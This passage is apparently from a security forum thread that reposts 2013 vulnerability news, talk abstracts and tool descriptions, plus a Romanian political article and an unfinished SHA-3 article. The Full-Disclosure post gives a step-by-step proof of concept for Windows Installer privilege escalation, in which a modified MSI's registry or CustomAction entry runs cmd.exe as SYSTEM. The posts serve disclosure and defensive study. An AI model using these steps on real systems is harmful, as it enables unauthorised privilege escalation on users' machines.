2013[/TD] [/TR] [TR] [TD=class: vendor, align: left]OpenSSL[/TD] [TD=class: status, align: center]Not Affected[/TD] [TD=class: notified, align: center]16 Aug 2013[/TD] [TD=class: updated, align: center]03 Sep 2013[/TD] [/TR] [TR=class: row-alt] [TD=class: vendor, align: left]Amazon[/TD] [TD=class: status, align: center]Unknown[/TD] [TD=class: notified, align: center]16 Aug 2013[/TD] [TD=class: updated, align: center]03 Sep 2013[/TD] [/TR] [TR] [TD=class: vendor, align: left]AMD[/TD] [TD=class: status, align: center]Unknown[/TD] [TD=class: notified, align: center]16 Aug 2013[/TD] [TD=class: updated, align: center]16 Aug 2013[/TD] [/TR] [TR=class: row-alt] [TD=class: vendor, align: left]Attachmate[/TD] [TD=class: status, align: center]Unknown[/TD] [TD=class: notified, align: center]16 Aug 2013[/TD] [TD=class: updated, align: center]03 Sep 2013[/TD] [/TR] [TR] [TD=class: vendor, align: left]Certicom[/TD] [TD=class: status, align: center]Unknown[/TD] [TD=class: notified, align: center]16 Aug 2013[/TD] [TD=class: updated, align: center]16 Aug 2013[/TD] [/TR] [TR=class: row-alt] [TD=class: vendor, align: left]Crypto++ Library[/TD] [TD=class: status, align: center]Unknown[/TD] [TD=class: notified, align: center]16 Aug 2013[/TD] [TD=class: updated, align: center]16 Aug 2013[/TD] [/TR] [TR] [TD=class: vendor, align: left]EMC Corporation[/TD] [TD=class: status, align: center]Unknown[/TD] [TD=class: notified, align: center]16 Aug 2013[/TD] [TD=class: updated, align: center]16 Aug 2013[/TD] [/TR] [/TABLE] If you are a vendor and your product is affected, let us know.View More » CVSS Metrics (Learn More) [TABLE] [TR] [TH=bgcolor: #EBEBEB, align: left]Group[/TH] [TH=bgcolor: #EBEBEB, align: center]Score[/TH] [TH=bgcolor: #EBEBEB, align: left]Vector[/TH] [/TR] [TR] [TD=class: cvss-metric-group, align: left]Base[/TD] [TD=class: cvss-score, align: center]2.4[/TD] [TD=class: cvss-vector, align: left]AV:L/AC:H/Au:S/C:P/I:P/A:N[/TD] [/TR] [TR] [TD=class: cvss-metric-group, align: left]Temporal[/TD] [TD=class: cvss-score, align: center]1.9[/TD] [TD=class: cvss-vector, align: left]E:POC/RL:OF/RC:C[/TD] [/TR] [TR] [TD=class: cvss-metric-group, align: left]Environmental[/TD] [TD=class: cvss-score, align: center]2.3[/TD] [TD=class: cvss-vector, align: left]CDP:ND/TD:M/CR:H/IR:H/AR:ND[/TD] [/TR] [/TABLE] References http://eprint.iacr.org/2013/448.pdf CWE - CWE-200: Information Exposure (2.5) [Announce] [security fix] GnuPG 1.4.14 released [Announce] [security fix] Libgcrypt 1.5.3 released Credit Thanks to Yuval Yarom and Katrina Falkner for reporting this vulnerability and for help writing this document. This document was written by Adam Rauf. Other Information CVE IDs: CVE-2013-4242 Date Public: 05 Sep 2013 Date First Published: 01 Oct 2013 Date Last Updated: 01 Oct 2013 Document Revision: 33 Sursa: Vulnerability Note VU#976534 - L3 CPU shared cache architecture is susceptible to a Flush+Reload side-channel attack Paper: http://eprint.iacr.org/2013/448.pdf
  13. Defense in depth -- the Microsoft way (part 10) From: "Stefan Kanthak" <stefan.kanthak () nexgo de> Date: Sat, 21 Sep 2013 23:06:13 +0200 Hi @ll, all products, security patches and hotfixes distributed as self- extracting packages (IExpress, "update.exe" etc.) which contain a *.MSI or *.MSP leave dangling references to these files after their installation. "In certain situations ..." (see below) these dangling references allow a privilege escalation. Proof of concept (run on a fully patched Windows 7 SP1): Step 0: a) lögin as UNPRIVILEGED user. Step 1: a) download the IExpress package "CAPICOM-KB931906-v2102.exe" from <http://www.microsoft.com/en-us/download/details.aspx?id=3207> resp. <http://technet.microsoft.com/security/bulletin/ms07-028> check/verify the Authenticode (digital) signature of the downloaded "CAPICOM-KB931906-v2102.exe" c) execute the downloaded "CAPICOM-KB931906-v2102.exe" (UAC will ask for confirmation or prompt for administrative credentials): * the IExpress installer unpacks its contents into the directory "%TEMP%\IXP000.TMP\", calls MSIEXEC.EXE to install the unpacked "capicom2.msi" and removes the temporary directory afterwards; * MSIEXEC.EXE creates the following registry entries with dangling references to the (later) deleted "capicom2.msi" in the removed temporary directory: [HKEY_CLASSES_ROOT\Installer\Products\9F2FDFE0D6387BE43AD230B83D1FBFA2\SourceList] "PackageName"="capicom2.msi" "LastUsedSource"=expand:"n;1;C:\\Users\\Owner\\AppData\\Local\\Temp\\IXP000.TMP\\" [[HKEY_CLASSES_ROOT\Installer\Products\9F2FDFE0D6387BE43AD230B83D1FBFA2\SourceList\Media] "DiskPrompt"="Security Update for CAPICOM (KB931906) Installation Disk" "1"=";" [HKEY_CLASSES_ROOT\Installer\Products\9F2FDFE0D6387BE43AD230B83D1FBFA2\SourceList\Net] "1"=expand:"C:\\Users\\Owner\\AppData\\Local\\Temp\\IXP000.TMP\\" [HKEY_CLASSES_ROOT\Microsoft\Windows\CurrentVersion\Uninstall\{0EFDF2F9-836D-4EB7-A32D-038BD3F1FB2A}] "InstallSource"="C:\\Users\\Owner\\AppData\\Local\\Temp\\IXP000.TMP\\" Step 2: a) extract "capicom2.msi" from "CAPICOM-KB931906-v2102.exe" (see <http://support.microsoft.com/kb/197147> for instructions). recreate the directory "%TEMP%\IXP000.TMP\". c) copy the extracted "capicom2.msi" to "%TEMP%\IXP000.TMP\". d) check/verify the Authenticode (digital) signature of "%TEMP%\IXP000.TMP\capicom2.msi". e) open "%TEMP%\IXP000.TMP\capicom2.msi" with the .MSI editor of your choice and insert (for example) the following column into its 'registry' table: REGKEY0,2,SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce,OUCH!,cmd.exe /k echo %CMDCMDLINE%,COM2000 or (for example) the following column into its 'CustomAction' table: OUCH!,3122,cmd.exe,/k title %USERDOMAIN%\%USERNAME% f) check the Authenticode signature of the modified "capicom2.msi": it is INVALID now! g) execute "MSIEXEC.EXE /A %TEMP%\IXP000.TMP\capicom2.msi" and follow the dialogs. Especially notice that NO warning/hint about the broken/invalid Authenticode signature is displayed! OUCH! Step 3: a) read <http://support.microsoft.com/kb/944298>: | In certain situations, Setup cannot find the .msi file in the | Windows Installer cache. In these situations, Setup tries to | resolve the source location by testing for the presence of the | product installation in the last-used location when Setup was | last run. If Setup cannot resolve the source location, the user | is prompted to provide the installation media. determine the name of the cached .MSI file, for example via: REG.EXE "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData \S-1-5-18\Products\9F2FDFE0D6387BE43AD230B83D1FBFA2\InstallProperties" /v "LocalPackage" (its pathname is "%SystemRoot%\Installer\<random>.msi"). c) delete the cached .MSI file found in the substep before. Yes, this needs administrative rights; but read MSKB 944298 again: "in certain situations ...". I just enforce such a certain situation! d) execute "MSIEXEC.EXE /fm {0EFDF2F9-836D-4EB7-A32D-038BD3F1FB2A}". Again: NO warning/hint about the broken/invalid Authenticode signature is displayed. And: UAC does NOT prompt for confirmation or credentials! If you added a column to the 'CustomAction' table CMD.EXE runs and shows "NT AUTHORITY\SYSTEM" in its title bar. e) execute REG.EXE QUERY "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce" /v "OUCH!" and conclude that the modified "%TEMP%\IXP000.TMP\capicom2.msi" was run with administrative (really: "LocalSystem") privileges. Timeline: ~~~~~~~~~ 2008-04-09 informed vendor that MSKB 931906 creates dangling references and MSIEXEC.EXE /f... prompts user for location of capicom2.msi 2008-04-11 vendor asked: "have you tried removing the update via Add/Remove Programs and then re-installing?" 2008-04-11 replied to vendor: that's NOT the point here ... no more answer! 2013-05-20 next try... stay tuned Stefan Kanthak PS: as examples for other self-extracting packages use "msxml4-KB2758694-enu.exe" and "msxml6-KB2758696-enu-x86.exe", available from <http://www.microsoft.com/en-us/download/details.aspx?id=36292> and <http://www.microsoft.com/en-us/download/details.aspx?id=36316> resp. <http://technet.microsoft.com/security/bulletin/MS13-002>, which create the following registry entries: [HKEY_CLASSES_ROOT\Installer\Products\745017A5E85BB88428D8ACA9520A35C3\SourceList] "PackageName"="msxml6.msi" "LastUsedSource"=expand:"n;1;c:\\c3d7dd340cec94ff5838ba93\\" [HKEY_CLASSES_ROOT\Installer\Products\745017A5E85BB88428D8ACA9520A35C3\SourceList\Media] "DiskPrompt"="[1]" "1"=";" [HKEY_CLASSES_ROOT\Installer\Products\745017A5E85BB88428D8ACA9520A35C3\SourceList\Net] "1"=expand:"c:\\c3d7dd340cec94ff5838ba93\\" Other products which exhibit the same problem are (not exhaustive, in no particular order): 1. Microsoft Security Essentials [HKEY_CLASSES_ROOT\Installer\Products\000021599B0090400000000000F01FEC\SourceList] "PackageName"="dw20shared.msi" "LastUsedSource"=expand:"n;1;c:\\62bf30c6a367eb52738a55\\x86\\" [HKEY_CLASSES_ROOT\Installer\Products\000021599B0090400000000000F01FEC\SourceList\Media] "DiskPrompt"="Microsoft Application Error Reporting" "1"="OFFICE12;1" [HKEY_CLASSES_ROOT\Installer\Products\000021599B0090400000000000F01FEC\SourceList\Net] "1"=expand:"c:\\62bf30c6a367eb52738a55\\x86\\" "2"=expand:"C:\\Program Files\\Microsoft Security Client\\Backup\\" [HKEY_CLASSES_ROOT\Installer\Products\BB8DD09375BB24940A92D219E3E4D947\SourceList] "PackageName"="epp.msi" "LastUsedSource"=expand:"n;1;c:\\0d149c673ede07404629f38d05a7\\x86\\" [HKEY_CLASSES_ROOT\Installer\Products\BB8DD09375BB24940A92D219E3E4D947\SourceList\Media] "1"=";" [HKEY_CLASSES_ROOT\Installer\Products\BB8DD09375BB24940A92D219E3E4D947\SourceList\Net] "1"=expand:"C:\\0d149c673ede07404629f38d05a7\\x86\\" "2"=expand:"C:\\Program Files\\Microsoft Security Client\\Backup\\" 2. .NET Framework 1.1 [HKEY_CLASSES_ROOT\Installer\Products\DDE7F2BCF1D91C3409CFF425AE1E271A\SourceList] "PackageName"="netfx.msi" "LastUsedSource"=expand:"n;1;C:\\DOCUME~1\\Owner\\LOCALS~1\\Temp\\IXP000.TMP\\" [HKEY_CLASSES_ROOT\Installer\Products\DDE7F2BCF1D91C3409CFF425AE1E271A\SourceList\Media] "DiskPrompt"="[1]" "1"=";Microsoft .NET Framework 1.1 [Disk 1]" ... "21"="URTSTDD1;Microsoft .NET Framework 1.1 [Disk 1]" ... [HKEY_CLASSES_ROOT\Installer\Products\DDE7F2BCF1D91C3409CFF425AE1E271A\SourceList\Net] "1"=expand:"C:\\DOCUME~1\\Owner\\LOCALS~1\\Temp\\IXP000.TMP\\" [HKEY_CLASSES_ROOT\Installer\Patches\7FCDE114D557E4147AB4D3DC56385F98\SourceList] "PackageName"="tmp517.tmp" "LastUsedSource"=expand:"n;1;C:\\DOCUME~1\\Owner\\LOCALS~1\\Temp\\IXP000.TMP\\" [HKEY_CLASSES_ROOT\Installer\Patches\7FCDE114D557E4147AB4D3DC56385F98\SourceList\Media] "DiskPrompt"="[1]" "20872"=";Microsoft .NET Framework 1.1 Service Pack 1 (KB867460)" [HKEY_CLASSES_ROOT\Installer\Patches\7FCDE114D557E4147AB4D3DC56385F98\SourceList\Net] "1"=expand:"C:\\DOCUME~1\\Owner\\LOCALS~1\\Temp\\IXP000.TMP\\" ... 3. Visual C++ 2005 Redistributable 8.0.56336 [HKEY_CLASSES_ROOT\Installer\Products\b25099274a207264182f8181add555d0\SourceList] "PackageName"="vcredist.msi" "LastUsedSource"=expand:"n;1;C:\\Users\\Owner\\AppData\\Local\\Temp\\IXP001.TMP\\" [HKEY_CLASSES_ROOT\Installer\Products\b25099274a207264182f8181add555d0\SourceList\Media] 1=";Microsoft Visual C++ 2005 Redistributable [Disk 1]" DiskPrompt="[1]" [HKEY_CLASSES_ROOT\Installer\Products\b25099274a207264182f8181add555d0\SourceList\Net] "1"=expand:"C:\\Users\\Owner\\AppData\\Local\\Temp\\IXP001.TMP\\" 4. Visual C++ 2005 Redistributable (x64) 8.0.59192 "PackageName"="vcredist.msi" "LastUsedSource"=expand:"n;1;C:\\Users\\Owner\\AppData\\Local\\Temp\\IXP001.TMP\\" 5. Visual C++ 2005 Redistributable (x64) 8.0.61000 "PackageName"="vcredist.msi" "LastUsedSource"=expand:"n;1;C:\\Users\\Owner\\AppData\\Local\\Temp\\IXP000.TMP\\" 6. Virtual PC 2007 Service Pack 1 [HKEY_CLASSES_ROOT\Installer\Products\899384DAA9E2504438FFE605A34FC9BB\SourceList] "PackageName"="Virtual_PC_2007_Install.msi" "LastUsedSource"="n;1;C:\\Users\\Owner\\AppData\\Local\\Temp\\IXP000.TMP\\" [HKEY_CLASSES_ROOT\Installer\Products\899384DAA9E2504438FFE605A34FC9BB\SourceList\Media] "1"=";" [HKEY_CLASSES_ROOT\Installer\Products\899384DAA9E2504438FFE605A34FC9BB\SourceList\Net] "1"=expand:"C:\\Users\\Owner\\AppData\\Local\\Temp\\IXP000.TMP\\" [HKEY_CLASSES_ROOT\Installer\Patches\F932FFF94C172E04DAC6E2E68C62E958\SourceList] "PackageName"="KB958162.msp" "LastUsedSource"=expand:"n;1;C:\\Users\\Owner\\Downloads\\" [HKEY_CLASSES_ROOT\Installer\Patches\F932FFF94C172E04DAC6E2E68C62E958\SourceList\Media] "100"=";" [HKEY_CLASSES_ROOT\Installer\Patches\F932FFF94C172E04DAC6E2E68C62E958\SourceList\Net] "1"=expand:"C:\\Users\\Owner\\Downloads\\" "2"=expand:"PatchSourceList" 7. Windows Media Player Firefox Plugin [HKEY_CURRENT_USER\Software\Microsoft\Installer\Products\6BBFDF96D153C8B4988D68D79C0D2A4A\SourceList] "PackageName"="ffplugin.msi" "LastUsedSource"="n;1;C:\\Users\\Owner\\AppData\\Local\\Temp\\IXP000.TMP\\" [HKEY_CURRENT_USER\Software\Microsoft\Installer\Products\6BBFDF96D153C8B4988D68D79C0D2A4A\SourceList\Media] "DiskPrompt"="Windows Media Player Firefox Plugin Installation" "1"=";CD-ROM #1" [HKEY_CURRENT_USER\Software\Microsoft\Installer\Products\6BBFDF96D153C8B4988D68D79C0D2A4A\SourceList\Net] "1"=expand:"C:\\Users\\Owner\\AppData\\Local\\Temp\\IXP000.TMP\\" _______________________________________________ Full-Disclosure - We believe in it. Charter: [Full-Disclosure] Mailing List Charter Hosted and sponsored by Secunia - Computer Security - Software & Alerts - Secunia Sursa: Full Disclosure: Defense in depth -- the Microsoft way (part 10)
  14. Hitb 2013 - Hugo Teso - Aircraft Hacking: Practical Aero Series Description: PRESENTATION ABSTRACT: This presentation will be a practical demonstration on how to remotely attack and take full control of an aircraft, exposing some of the results of my three years research on the aviation security field. The attack performed will follow the classical methodology, divided in discovery, information gathering, exploitation and post-exploitation phases. The complete attack will be accomplished remotely, without needing physical access to the target aircraft at any time, and a testing laboratory will be used to attack virtual airplanes systems. ADS-B and ACARS protocols will be used during the discovery and information gather phases, but none of those protocols are the objective of this research, I will just use them to plot and analyze the potential targets. Very basic information on such protocols will be displayed as well as additional references for further reading. The real target of the attacks will be some on-board systems, complex enough to be vulnerable to (almost) common vulnerability research and exploitation techniques. Different post-exploitation vectors will finally be considered in order to gain better aircraft control. ABOUT HUGO TESO Hugo Teso works as a security consultant at n.runs AG in Germany. He has been working on IT security for the last 11 years, mainly in Spain. Also being a commercial pilot, it was just a matter of time before he focused his attention on aviation security. Together with the development of some open source projects, like Inguma and Bokken, he has spent a lot of time on aviation security research and has presented some of the results in conferences like RootedCon. For More Information please visit : - HITBSecConf - NETHERLANDS / MALAYSIA Sursa: Hitb 2013 - Hugo Teso - Aircraft Hacking: Practical Aero Series
  15. Hitb 2013 - Philippe Langlois - Lte Pwnage - Hacking Core Network Elements Description: PRESENTATION ABSTRACT: Phrack and other magazines used to be full of obscure hardware and systems descriptions for telecom equipment that were the pride and the thrill of many dark-corner hackers. There's a specific kink about these strange OS, protocols and interfaces. But sadly (or not, as we'll see), it's a gone era. Gone are the DMS100, the DX200, the COSMOS switches and other telecom legacy beauty, ahem, well, at least it SHOULD BE GONE. Today, we're entering the realm of LTE super high speed always-on connectivity and with that comes the victory of TCP/IP in front of the old ITU/3GPP protocols. And with this comes many side effects: software gets standardized, everything runs on top of ATCA (Advanced Telecom Computing Architecture) hardware running mostly Linux -give or take 6 or 8 proprietary FPGA-based sister cards, TFTP-booted with decade old VxWorks that routinely show hardcoded DES credentials and funny "behaviour". Easily 20 GB of fat C++ binaries, some for x86, PPC, MIPS, some with up to 200 Mbytes file sizes for one single EXE! It's called a vulnerability research and reverse engineering paradise... or hell. All the protocols now run on top of IP, which ends up having 12 layers thanks to encapsulation and still the weight of legacy in bugs quantity and diversity. We'll see how the porting of SS7 MAP on top of IP (SIGTRAN, Diameter) has given rise to funny Denial of Service (DoS) attacks against telecom core elements (DSR, STP), with trashy-crashy anti-forensics consequences for DPI and tracking (Hey @grugq!!). We'll look into specific vulnerabilities, and talk about the very particular way that Network Equipment Vendors deal with security in the telecom domain. We will demo a virtualized Huawei HSS from our testbed and show some of the vulnerabilities and attacks directly on the equipment itself. We will finally talk about telco equipment and product security reviews and the fallacy of (some) certification and (many) standardization attempts. We will then see how to conduct a practical and fast telecom product security life cycle with automation and open source tools. ABOUT PHILIPPE LANGLOIS Philippe Langlois is an entrepreneur and leading security researcher, expert in the domain of telecom and network security. He has founded internationally recognized security companies (Qualys, WaveSecurity, INTRINsec, P1 Security) as well as led technical, development and research teams (Solsoft, TSTF). He founded Qualys and led the world-leading vulnerability assessment service. He founded a pioneering network security company Intrinsec in 1995 in France. His first business, Worldnet, France's first public Internet service provider, was founded in 1993. Philippe was also lead designer for Payline, one of the first e-commerce payment gateways. He has written and translated security books, including some of the earliest references in the field of computer security, and has been giving speeches on network security since 1995 (Interop, BlackHat, HITB, Hack.lu). Previously a professor at Ecole de Guerre Economique and various universities in France (Amiens, Marne La Vallée) and internationally (FUSR-U, EERCI, ANRSI). He is a FUSR-U collaborator and founding member. Philippe advises industry associations (GSM Association Security Group, several national organizations) and governmental officials and contributes to Critical Infrastructure advisory committees and conferences in Telecom and Network security. Now, Philippe is providing with P1 Security the first Core Network Telecom Signaling security scanner & auditor which help telecom companies, operators and government analyze where and how their critical telecom network infrastructure can be attacked. He can be reached through his website at: P1 Security For More Information please visit : - HITBSecConf - NETHERLANDS / MALAYSIA Sursa: Hitb 2013 - Philippe Langlois - Lte Pwnage - Hacking Core Network Elements
  16. Derbycon 2013 - Scanning Darkly- Hd Moore Description: Bio: HD Moore is the Chief Research Officer at Rapid7, responsible for leading Rapid7 Labs research into real world threats and providing guidance on how to address them. In addition, HD drives technical innovation across Rapid7?s products and services, applying technology to the challenge of identifying and defending against current and emerging threats, as well as heading the development of experimental prototypes and free tools. HD is the creator and chief architect of Metasploit, the world’s leading open source penetration testing framework, and remains deeply involved in Metasploit’s evolution at the architectural level. For More Information please visit : - Derbycon 2013 Videos (Hacking Illustrated Series InfoSec Tutorial Videos) Sursa: Derbycon 2013 - Scanning Darkly- Hd Moore
  17. snuck : Automatic XSS filter bypass Tool Reported by Sabari Selvan on Tuesday, October 23, 2012 snuck is an automated tool that may definitely help in finding XSS vulnerabilities in web applications. It is based on Selenium and supports Mozilla Firefox, Google Chrome and Internet Explorer. The approach, it adopts, is based on the inspection of the injection's reflection context and relies on a set of specialized and obfuscated attack vectors for filter evasion. In addition, XSS testing is performed in-browser, a real web browser is driven for reproducing the attacker's behavior and possibly the victim's. Description snuck is quite different from typical web security scanners, it basically tries to break a given XSS filter by specializing the injections in order to increase the success rate. The attack vectors are selected on the basis of the reflection context, that is the exact point where the injection falls in the reflection web page's DOM. Having access to the pages' DOM is possible through Selenium Web Driver, which is an automation framework, that allows to replicate operations in web browsers. Since many steps could be involved before an XSS filter is "activated", an XML configuration file should be filled in order to make snuck aware of the steps it needs to perform with respect to the tested web application. Practically speaking, the approach is similar to the iSTAR's one, but it focuses on one particular XSS filter. Download it from here: Downloads - snuck - Automatic XSS filter bypass - Google Project Hosting Tutorial can be found here: Tutorial - snuck - how to use snuck - Automatic XSS filter bypass - Google Project Hosting
  18. Gest grav ?i incon?tient: USL a dat mân? liber? DNA la intercept?ri. Procurorii pot intra prin efrac?ie chiar ?i în dormitor mar?i 01, octombrie 2013 / 14:32 Scris de Oana St?nciulescu Majoritatea USL din Parlament habar nu are ce voteaz?. De?i strig? c? dosarele sunt f?cute la comand? politic? din cauza intercept?rilor, ace?tia au acordat puteri nelimitate procurorilor anticorup?ie, scrie pesurse.ro. În noul Cod de procedur? penal?, care se va aplica din februarie 2014, parlamentarii coali?iei au votat dou? dintre alineatele strecurate în art. 12 al Legii nr. 51/91, adoptate prin art. 29 al Legii nr. 255/2013, care prev?d c? serviciile pot intra când vor în casele suspec?ilor, inclusiv prin efrac?ie ?i s?-i filmeze chiar ?i în dormitor, toate informa?iile astfel ob?inute reprezentând apoi probe zdrobitoare în fa?a instan?ei. Parlamentarii actualei coali?ii guvernamentale au votat, cel mai probabil pe necitite, Legea nr.255, care a ?i fost publicat? în Monitorul Oficial din 14.08.2013. Este vorba despre punerea în aplicare a Legii nr. 135/2010 privind Codul de procedur? penal? ?i pentru modificarea ?i completarea unor acte normative care cuprind dispozi?iile procesuale penale. Iar printre modific?rile adoptate de c?tre distin?ii parlamentari USL se prevede ?i c? „Legea nr. 51/91 privind siguran?a na?ional? a României” se transform? în “Legea privind securitatea na?ional? a României”. Iar trecerea de la “siguran??” la “securitate” poate fi justificat? ?i prin dedesubturile câtorva dintre cele zece articole noi introduse astfel în lege, relateaz? Na?ional. Ce a votat majoritatea parlamentar? USL a votat pentru extinderea f?r? precedent a “activit??ilor specifice pe care le pot desf??ura organele cu atribu?ii în domeniul securit??ii na?ionale”. Astfel, art. 12(2) lit. a) prevede: “ interceptarea ?i înregistrarea comunica?iilor electronice efectuate, sub orice form?”. Iar alte alineate permit interceptarea, tot “sub orice form?” ?i a celorlalte feluri de comunicare posibile, de la telefoane pân? la telegrame po?tale, inclusiv localizarea unui suspect prin satelit. De asemenea, lit. c) prevede “ridicarea ?i repunerea la loc a unui obiect sau document, examinarea lui, extragerea informa?iilor pe care acesta le con?ine, precum ?i înregistrarea, copierea sau ob?inerea de extrase prin orice procedee“. Practic, ofi?erii sub acoperire pot, în mod legal, începând din februarie, s? intre prin efrac?ie într-un birou, s? pun? camere de filmat acolo, dup? care pot reveni când vor, tot ca “?pringarii”, s? ia microfoanele sau s? pun? altele. Opera?iunile pot fi derulate, în premier?, nu doar în locuri publice, dar ?i la domiciliile suspec?ilor. La lit. d), distin?ii parlamentari au votat ?i permis “instalarea de obiecte, între?inerea ?i ridicarea acestora din locurile în care au fost depuse, supravegherea prin fotografiere, filmare sau prin alte mijloace tehnice ori constat?ri personale, efectuate sistematic în locuri publice sau efectuate în orice mod în locuri private”. Astfel fiecare cet??ean poate fi înregistrat ?i în dormitor, în tandre?urile cu amanta sau so?ia. Totodat?, în noul Cod de procedur? penal?, cei care sper? c? vor sc?pa de DNA se în?eal?. La capitolul 2, art. 5 (3), se specific?: “la judecarea cauzelor ?i la solu?ionarea propunerilor, contesta?iilor, plângerilor sau a oric?ror alte cereri în care cercetarea penal? a fost efectuat? de Direc?ia Na?ionala Anticorup?ie potrivit legii vechi, (….), particip? procurori din cadrul DNA”. Asta ca s? vede?i ce a votat distinsa majoritate USL în Parlament! Sursa: Gest grav ?i incon?tient: USL a dat mân? liber? DNA la intercept?ri. Procurorii pot intra prin efrac?ie chiar ?i în dormitor | ExpresMagazin
  19. Android's Firefox app Vulnerability allows hacker to steal files from SD card Author: Mohit Kumar, The Hacker News - Tuesday, October 01, 2013 Mobile Browsers are complicated applications and locking them down against threats is extremely difficult. According to a Mobile Security Researcher, Sebastián Guerrero from 'viaForensics', Android's Firefox browser app is vulnerable to Hackers. He responsibly disclosed the details to Mozilla, that allows hackers to access both the contents of the SD card and the browser's private data. He posted a video showing how hackers will be able to access data on the device. The flaw works only if a user install a malicious application or opened a locally stored HTML file in the vulnerable Firefox app that included malicious Javascript code. Successful Exploitation allows attacker to access to files on the SD Card including all of users’ cookies, login credentials, bookmarks etc. This is a privacy issue and could be severe depending on what is stored there, including personal pictures and video, or data placed there by other applications. http://www.youtube.com/watch?v=q74g58kX5lQ&feature=player_embedded Files are accessed through the standard “file://” URI syntax. Firefox encrypts the data stored in internal storage which is why hackers also introduce a third-party app which gets the encrypted keys stored on the device. "However, to protect the most sensitive information, apps can place data in a separate location called internal storage, a private folder for each app that even the user is prevented from accessing directly (unless the device is rooted). The most significant threat from this vulnerability is that the secured location for Firefox is also accessible, which means a hacker will have access to cookies, login credentials, bookmarks, and anything else Mozilla think should be kept safely tucked away." Androidpolice blog explained. We contacted Sebastián to get more details, please find a quick FAQ on the matter as follows: Q. Can an attacker host the malicious Javascript code HTML file on a server to exploit the flaw remotely by making victim to visit the website only ? A. The exploit cannot be executed by a remote web page. This flaw works only if you install an application, but there is another vulnerability in Firefox that could allow an attacker to install applications without user's knowledge. I disclosed it to the Firefox, but other researcher did the same before me. But it's possible to host the malicious HTML file somewhere and using some social engineering , attacker can make victim to download and execute the file locally on their Firefox app. Q. To steal the files from the victim's SD card, an attacker need to pre-define the file names or folder path in the exploit code ? A. Nope, there is no need to specify the path, because I'm obtaining the salted folder generated by Firefox at runtime, due to a vulnerability. So I can make a copy of the SDcard, because the path will be always /sdcard, and for the private folder locates at /data/data/org.mozilla. Firefox, I'm obtaining at runtime the salted profile generated. Q. Where and how stolen files will be uploaded ? A. You can upload it where you want i.e. Using exploit code we are opening a socket connection against the remote FTP server to upload stolen files. Q. Is there any CVE ID or Mozilla's Security Advisories ID defined for the Vulnerability yet ? A. As far as I know there isn't a CVE assigned to this vulnerability. Mozilla has patched the vulnerability in patched in Firefox 24 for Android. Just few weeks back a Russian hacker put up a Zero-day Exploit for sale, that forces the Android Firefox browser to download and execute a malicious app. Sursa: Android's Firefox app Vulnerability allows hacker to steal files from SD card - The Hacker News
  20. Nytro

    drozer

    drozer The Leading Security Testing Framework for Android. drozer enables you to search for security vulnerabilities in apps and devices by assuming the role of an app and interacting with the Dalvik VM, other apps’ IPC endpoints and the underlying OS. drozer provides tools to help you use and share public Android exploits. It helps you to deploy a drozer agent by using weasel – MWR’s advanced exploitation payload. For the latest drozer updates, follow @mwrdrozer. [h=3]Features[/h] drozer allows you to use dynamic analysis during an Android security assessment. By assuming the role of an Android app you can: find information about installed packages. interact with the 4 IPC endpoints – activities, broadcast receivers, content providers and services. use a proper shell to play with the underlying Linux OS (from the content of an unprivileged application). check an app’s attack surface, and search for known vulnerabilities. create new modules to share your latest findings on Android. drozer’s remote exploitation features provide a unified framework for sharing Android payloads and exploits. It helps to reduce the time needed for vulnerability assessments and mobile red-teaming exercises, and includes the outcome of some of MWR’s cutting-edge research into advanced Android payloads and exploits. [h=3]How it Works[/h] drozer does all of this over the network: it does not require ADB. For the latest Mercury updates, follow @mwrdrozer. Download: https://www.mwrinfosecurity.com/products/drozer/community-edition/ Sursa: https://labs.mwrinfosecurity.com/tools/drozer/
  21. Offtopic: National Institute of Standards and Technology Page Not Found Due to a lapse in government funding, the National Institute of Standards and Technology (NIST) is closed and most NIST and affiliated web sites are unavailable until further notice. We sincerely regret the inconvenience. The National Vulnerability Database and the NIST Internet Time Service web sites will continue to be available. A limited number of other web sites may also be available.
  22. What the heck is going on with NIST’s cryptographic standard, SHA-3? by Joseph Lorenzo Hall September 24, 2013 (Warning: this is a fairly technical post about cryptographic standards setting.) The cryptographic community has been deeply shaken since revelations earlier this month that the National Security Agency (NSA) has been using a number of underhanded methods – stealing encryption keys, subverting standards setting processes, planting backdoors in products – to undermine much of the encryption used online. This includes crucial pieces of e-commerce like HTTPS (SSL/TLS) and Virtual Private Networks (VPN) that we use each day to purchase things online, to socialize in private, and that businesses use to communicate confidential and proprietary information. While the reporting has been vague and hasn’t pointed to specific software versions or protocols that have been compromised, last week RSA Security – a major supplier of cryptographic software and hardware – initiated a product recall of sorts, warning users that one of its popular software encryption products contained a likely NSA-planted backdoor. The practical implication of the RSA recall is that much of the encryption that used this product since 2007 isn’t nearly as secure as it was supposed to be. Those of us who follow developments in the cryptographic community have noticed another troubling development: there are a number of cryptographers upset with how the National Institute of Standards and Technology (NIST) is standardizing a new set of encryption algorithms called SHA-3 (which stands for the third version of the Secure Hashing Algorithm). The remainder of this post explains what is going on with SHA-3 and how NIST could defuse this particular controversy while it still has the chance. (Warning: In this post, I’m assuming the reader is familiar with the concepts underlying basic encryption tools, called “cryptographic primitives,” such as hash functions, digital signatures, and message authentication codes.) What is SHA-3? SHA-3 is the “next generation” hash algorithm being standardized by NIST. In 2005, researchers developed an attack that called into question the security guarantees of an earlier secure hash algorithm, SHA-1. The characteristics of this 2005 attack seemed to hint that it could be refined to attack many of the secure hash functions at the time, including SHA-0, MD4, MD5 and even SHA-2. At the time, for many cryptographers, the message was clear: a new hash algorithm is needed and it should be based on completely different underlying mathematics that are not susceptible to the attacks threatening known hash functions. To be clear: SHA-1 is thought to be on its way out, as people expect the earlier attacks to be improved considerably in the coming years and there hasn’t been any result that calls into question the soundness of SHA-2 at all. Attacks always improve, so it’s imperative that there is an alternative hash function ready to go when and if the floor falls out of the earlier hash functions. NIST’s cryptographic technology group is world-renowned for cryptographic algorithm standardization. In 2007, NIST began the process to develop and standardize a new secure hash algorithm that would be called SHA-3. The process for choosing a new algorithm was designed as a competition: new candidate algorithms were submitted by more than 60 research teams and over five years the entrants were whittled down to a set of finalists, from which a winner was chosen. In October of last year, NIST announced that a team of Italian and Belgian cryptographers had won the competition with their submission named, “Keccak” (pronounced “KECH-ack”). What has NIST done with SHA-3? Since the announcement of Keccak as the winner, NIST has been working hard to turn Keccak into a standard. That is, NIST can’t just point to the academic paper and materials submitted by the Keccak team and call that a standard. NIST has to write the algorithm up in a standards-compliant format and include it in other NIST cryptographic standards documents, such as a 